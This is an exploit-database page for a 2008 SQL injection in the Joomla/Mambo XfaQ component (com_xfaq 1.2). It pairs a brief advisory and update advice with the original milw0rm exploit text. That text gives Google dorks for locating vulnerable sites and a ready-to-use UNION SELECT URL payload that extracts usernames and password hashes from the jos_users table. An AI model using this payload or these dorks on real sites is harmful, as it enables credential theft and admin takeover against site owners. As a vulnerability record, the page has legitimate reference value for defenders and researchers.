header-logo
Suggest Exploit
vendor:
XfaQ
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: XfaQ
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: YES
Related CWE: N/A
CPE: a:mgfi:xfaq
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Joomla 1.x and Mambo 4.5.x
2008

joomla SQL Injection(com_xfaq)

The vulnerability exists due to insufficient filtration of user-supplied data passed via the 'aid' parameter to the '/index.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. This can be exploited to bypass authentication and gain access to the administrator's panel.

Mitigation:

Update to version 1.2.1 or later.
Source

Exploit-DB raw data:

###############################################################
#
#  joomla SQL Injection(com_xfaq)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com
# http://www.milw0rm.com/author/1334
#
# MAÄ°L : hackturkiye.hackturkiye@gmail.com
# www.milw0rm.com@gmail.com
#
################################################################
#
# DORK 1 : allinurl: aid "com_xfaq"
#
# DORK 2 : allinurl: "com_xfaq"
#
################################################################
EXPLOIT :

index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*

################################################################
# S@BUN              i AM NOT HACKER                  S@BUN
################################################################

<mosinstall type="component" version="4.5.2">
  <name>xfaq</name>
  <creationDate>2005.11.03</creationDate>
  <author>mic / mgfi</author>
  <copyright>mgfi.info</copyright>
  <license>Released under the GNU/GPL License</license>

  <authorEmail>info@mgfi.info</authorEmail>
  <authorUrl>www.mgfi.info</authorUrl>
  <version>1.2</version>
  <description>XfaQ is an addon for Joomla 1.x and Mambo 4.5.x. Based on SimpleFAQ 2.0.1 from www.parkviewconsultants.com</description>

# milw0rm.com [2008-02-13]

Navigation

Suggest Exploit

Services By CQR